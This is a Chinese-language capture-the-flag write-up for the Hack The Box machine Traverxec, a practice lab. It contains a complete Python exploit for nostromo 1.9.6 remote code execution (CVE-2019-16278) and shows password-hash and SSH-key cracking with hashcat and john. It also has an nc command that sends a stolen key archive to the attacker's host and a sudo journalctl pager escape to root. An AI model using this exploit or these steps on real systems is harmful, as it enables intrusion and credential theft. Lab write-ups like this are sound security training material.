HTB Linux Traverxec

简介
Nostromo中间件拿到初始访问权限，理解账号Nostromo配置文件的含义得到david shell，suid提权。靶机的难点在于理解并利用Nostromo配置文件，如果之前不了解Nostromo中间件，这块可能会成为最耗时的地方，另外，英文真的很重要，要学习了。

信息收集

1.端口扫描

# Nmap 7.70 scan initiated Sat Jan 11 17:13:53 2020 as: nmap -sC -sV -p22,80 --script=vuln -oA scan/Traverxec-vuln 10.10.10.165
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for localhost (10.10.10.165)
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open  http    nostromo 1.9.6
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=localhost
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://localhost:80/
|     Form id: contact-name
|_    Form action: empty.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nostromo 1.9.6
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  OSVDB:74721  CVE:CVE-2011-3192
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       http://osvdb.org/74721
|       http://seclists.org/fulldisclosure/2011/Aug/175
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_      http://nessus.org/plugins/index.php?view=single&id=55976
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 11 17:24:08 2020 -- 1 IP address (1 host up) scanned in 615.20 seconds

22端口，ssh服务，版本OpenSSH 7.9p1 Debian 10+deb10u1

80端口，http服务，版本nostromo 1.9.6

2.查中间件版本历史漏洞

$ searchsploit nostromo 1.9
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/usr/local/opt/exploitdb/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
nostromo 1.9.6 - Remote Code Execution                                                                               | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                                                 | exploits/linux/remote/35466.sh
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
Shellcodes: No Result
Papers: No Result

OpenSSh 7.9版本不存在问题，直接看nostromo，nostromo是一个开源的WEB中间件，版本1.9.3和1.9.6在2019年爆出了RCE，可以尝试利用。

nostromo RCE

使用47837.py，该exp默认运行在python2环境中，由于python3中socket套接字中发送和接收的数据都必须为utf-8格式，于是将原始exp的发送和接收的数据进行decode和encode即可，如下 ：

# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278


#!/usr/bin/env python3

import sys
import socket

art = """

                                        _____-2019-16278
        _____  _______    ______   _____\    \
   _____\    \_\      |  |      | /    / |    |
  /     /|     ||     /  /     /|/    /  /___/|
 /     / /____/||\    \  \    |/|    |__ |___|/
|     | |____|/ \ \    \ |    | |       \
|     |  _____   \|     \|    | |     __/ __
|\     \|\    \   |\         /| |\    \  /  \
| \_____\|    |   | \_______/ | | \____\/    |
| |     /____/|    \ |     | /  | |    |____/|
 \|_____|    ||     \|_____|/    \|____|   | |
        |____|/                        |___|/



"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection.decode()
    except:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload.encode())
    receive = connect(soc)
    ans = receive.split('\r\n\r\n\r\n')[1]
    print(ans)

if __name__ == "__main__":
    print(art)
    try:
        target = sys.argv[1]
        port = sys.argv[2]
        while 1:
            cmd = input('owef > ')
            if cmd in ['exit', 'quit']:
                break
            cve(target, port, cmd)

    except IndexError:
        print(help_menu)

拿到shell后，开始收集机器信息：

• 用户信息 ：david、root
• 系统及内核版本：Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux
• WEB目录相关配置：/var/nostromo/conf/nhttpd.conf、/var/nostromo/conf/.htpasswd，找到cisco ios密码（特征：\$1\$)
• sudoer配置：sudo -l，需要密码，无法利用
• home目录、root目录中可读可写的文件：find /home -perm -004 2>/dev/null，未查到；

/var/nostromo/conf/.htpasswd内容如下：

owef > ls /var/nostromo
conf
htdocs
icons
logs

owef > ls /var/nostromo/conf
mimes
nhttpd.conf

owef > ls /var/nostromo/conf/nhttpd.conf
/var/nostromo/conf/nhttpd.conf

owef > cat /var/nostromo/conf/nhttpd.conf
# MAIN [MANDATORY]

servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html

# LOGS [OPTIONAL]

logpid			logs/nhttpd.pid

# SETUID [RECOMMENDED]

user			www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons			/var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www


owef > cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

破解Cisco-IOS \$1\$ (MD5)

Cisco-IOS的MD5密码的特征为以”$1$”开头，于是使用hashcat离线破解，如下：

# 将hash写入文件中
$ echo $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ > david.hash
# crack
$ hashcat -m 500 -a 0 -d 2 david.hash ../../../tools/Passwd_Attack/wordlists/rockyou.txt 
# show
$ hashcat -m 500 -a 0 -d 2 david.hash ../../../tools/Passwd_Attack/wordlists/rockyou.txt --show
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me

拿到之后，尝试登陆ssh，失败 ；可能是个兔子洞？继续收集其他信息，无果，后来在朋友的提示下重新看/var/nostromo/conf/nhttpd.conf文件，查官方文档 ，从官方文档可以看到，如果配置了 homedirs选项，则可以通过”~用户名”的方式在web端访问 home目录中的内容，如：”http://10.10.10.165/~david/"

访问之后，发现提示：Private space. Nothing here. Keep out!于是用gobuster开始枚举目录，用了很多歌字典都没有成功；从shell直接访问david目录，也是没有权限。继续看配置文件说明，配置文件里有一句很重要的话：”You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.”，这句话的意思是，如果只想开放某一个目录，可以通过homedirs_public参数指定/home/\<user>/\<public_dir>，所以，如果通过该参数指定了某一目录，则该目录一定在/home目录下也存在。

如果只设置了homedirs参数，则homedirs目录下的所有文件夹、文件都可以通过WEB访问到，但是

信息收集

ls /var/nostromo
ls /var/nostromo/conf

cat /var/nostromo/conf/nhttpd.conf

cat /var/nostromo/conf/.htpasswd

find / -name "*.tgz"

细心阅读配置文件内容，找到新思路（感谢Saker大佬的tips，感谢google翻译）

config
配置文件关键内容如下：

HOMEDIRS
To serve the home directories of your users via HTTP, enable the homedirs option by defining the path in where the home directories are stored, normally /home. To access a users home directory enter a ~ in the URL followed by the home directory name like in this example:
http://www.nazgul.ch/~hacki/
The content of the home directory is handled exactly the same way as a directory in your document root. If some users don't want that their home directory can be accessed via HTTP, they shall remove the world readable flag on their home directory and a caller will receive a 403 Forbidden response. Also, if basic authentication is enabled, a user can create an .htaccess file in his home directory and a caller will need to authenticate.
You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.

• 如果配置了homedirs目录，则可以通过~加home目录名访问到对应用户的home目录，如下：http://10.10.10.165/~david/，home目录下文件的解析方式与document root目录下文件的解析方式相同
• 如果某个用户不想让自己的home目录被通过http访问到，可以移除所有用户读取的标志，此时通过WEB访问将获得403响应
• 如果用户在他的home目录中创建了.htaccess文件，调用者访问时将需要进行认证
• 如果指定了homedirs_public选项，则只能访问home目录中homedirs_public指定的目录，如：访问http://10.10.10.165/~david/时实际上访问的是"/home/david/public_www"目录
• nostromo服务通过user选项指定的用户(www-data)进行启动，如果可以通过WEB访问到/home/david/public_www目录，则说明www-data用户具有/home/david/public_www目录的读取权限，可直接通过shell进行访问

通过shell访问/home/david/public_www目录，找到protected-file-area目录，在该目录下，找到backup-ssh-identity-files.tgz文件；

通过nc传送到本地：

# kali
$ nc -lvvp 4444 > backup-ssh-identity-files.tgz

# 10.10.10.165
$ nc 10.10.14.151 4444 < backup-ssh-identity-files.tgz

解压taz文件，拿到david用户的公钥私钥

$ tar czvf backup-ssh-identity-files.tgz
# 解压之后是home目录，保存着/home/david/.ssh/目录的内容，如下：
$ ls
david
$ cd david/.ssh
$ ls
authorized_keys id_rsa          id_rsa.pub

破解私钥，登陆david

$ cp ./home/david/.ssh/id_rsa ./
# ssh2john
$ python /usr/share/john/ssh2john.py id_rsa > david.id_rsa.john
# john crach
$ john --format=SSH --wordlist=/usr/share/wordlist/rockyou.txt
# 查看密码
$ john --show david.id_rsa.john

拿到david私钥的密码：””

user:david

通过id_rsa登陆165

ssh david@10.10.10.165 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Wed Jan 15 10:58:44 2020 from 10.10.15.171
david@traverxec:~$ ls  -la
total 36
drwx--x--x 5 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 root  root  4096 Oct 25 14:32 ..
lrwxrwxrwx 1 root  root     9 Oct 25 16:15 .bash_history -> /dev/null
-rw-r--r-- 1 david david  220 Oct 25 14:32 .bash_logout
-rw-r--r-- 1 david david 3526 Oct 25 14:32 .bashrc
-rw-r--r-- 1 david david  807 Oct 25 14:32 .profile
drwx------ 2 david david 4096 Oct 25 17:02 .ssh
drwx------ 2 david david 4096 Oct 25 16:26 bin
drwxr-xr-x 3 david david 4096 Oct 25 15:45 public_www
-r--r----- 1 root  david   33 Oct 25 16:14 user.txt

从当前目录下发现bin目录，查看bin目录内容

david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls  -la
total 16
drwx------ 2 david david 4096 Oct 25 16:26 .
drwx--x--x 5 david david 4096 Oct 25 17:02 ..
-r-------- 1 david david  802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david  363 Oct 25 16:26 server-stats.sh

查看并运行server-stats.sh文件

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

# 运行server-stats.sh文件
david@traverxec:~/bin$ ./server-stats.sh
                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""'

Load:  11:10:19 up 23 min,  3 users,  load average: 0.00, 0.00, 0.00

Open nhttpd sockets: 11
Files in the docroot: 117

Last 5 journal log lines:
-- Logs begin at Wed 2020-01-15 10:47:08 EST, end at Wed 2020-01-15 11:10:19 EST. --
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): conversation failed
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Jan 15 10:59:46 traverxec sudo[956]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/usr/bin ; USER=root ; COMMAND=/usr/bin/chown -R www-data
Jan 15 11:03:53 traverxec sudo[1022]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/6 ruser=www-data rhost=  user=www-data
Jan 15 11:04:01 traverxec sudo[1022]: www-data : command not allowed ; TTY=pts/6 ; PWD=/home/david ; USER=root ; COMMAND=list

尝试直接用sudo运行journalctl文件，需要david用户的密码，

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl
[sudo] password for david:
Sorry, try again.
[sudo] password for david:
Sorry, try again.
[sudo] password for david:
sudo: 3 incorrect password attempts

Priv:root

通过journalctl获取shell

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
-- Logs begin at Wed 2020-01-15 10:47:08 EST, end at Wed 2020-01-15 11:14:57 EST. --
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): conversation failed
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Jan 15 10:59:46 traverxec sudo[956]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/usr/bin ; USER=root ; COMMAND=/usr/bin/chown -R www-data
Jan 15 11:03:53 traverxec sudo[1022]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/6 ruser=www-data rhost=  user=www-data
Jan 15 11:04:01 traverxec sudo[1022]: www-data : command not allowed ; TTY=pts/6 ; PWD=/home/david ; USER=root ; COMMAND=list
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Wed 2020-01-15 10:47:08 EST, end at Wed 2020-01-15 11:15:10 EST. --
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): conversation failed
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Jan 15 10:59:46 traverxec sudo[956]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/usr/bin ; USER=root ;
Jan 15 11:03:53 traverxec sudo[1022]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty
Jan 15 11:04:01 traverxec sudo[1022]: www-data : command not allowed ; TTY=pts/6 ; PWD=/home/david ; USER=roo
!/bin/bash
root@traverxec:/home/david/bin# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls -la
total 64
drwx------  3 root root  4096 Nov 12 04:00 .
drwxr-xr-x 18 root root  4096 Oct 25 14:17 ..
lrwxrwxrwx  1 root root     9 Oct 25 16:21 .bash_history -> /dev/null
-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root  4096 Nov 12 04:00 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rw-r--r--  1 root root 37520 Oct 25 14:43 nostromo_1.9.6-1.deb
-r--------  1 root root    33 Oct 25 16:21 root.txt
root@traverxec:~# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906

参考链接

https://www.exploit-db.com/exploits/47837
https://git.sp0re.sh/sp0re/Nhttpd-exploits
https://hashcat.net/forum/thread-4283.html